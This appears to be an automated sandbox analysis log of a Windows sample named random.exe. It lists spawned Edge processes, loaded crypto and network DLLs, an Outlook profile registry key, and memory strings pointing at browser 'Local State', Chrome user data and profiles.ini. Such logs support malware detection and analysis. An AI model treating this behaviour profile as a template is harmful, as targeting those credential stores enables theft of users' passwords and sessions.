Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3780 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2056,i,4096293946836122851,18064520161421918287,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6472 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6644 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2128,i,5363486696268237516,2027687803800706912,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3780 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: random.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: random.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: random.exeStatic file information: File size 2636800 > 1048576
Source: random.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x22da00
Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2J source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tics. source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbK} source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: random.exe, 00000000.00000003.2344673677.000001D2E6CA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbm}mn source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ers\jonT source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UC:\Users\user\AppData\Local\Google\Chrome\User Data\.pdb\01AB9056EA9380F71644C4339E3FA1AC28 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateZ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbN source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: V\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831y source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statet source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2f source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347715541.000001D2E6C29000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2348250269.000001D2E6C2A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346788951.000001D2E6C2A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: [C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Publishers. source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: l\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2344891449.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2345221924.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2344766987.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini;7 source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb{N3or source: random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
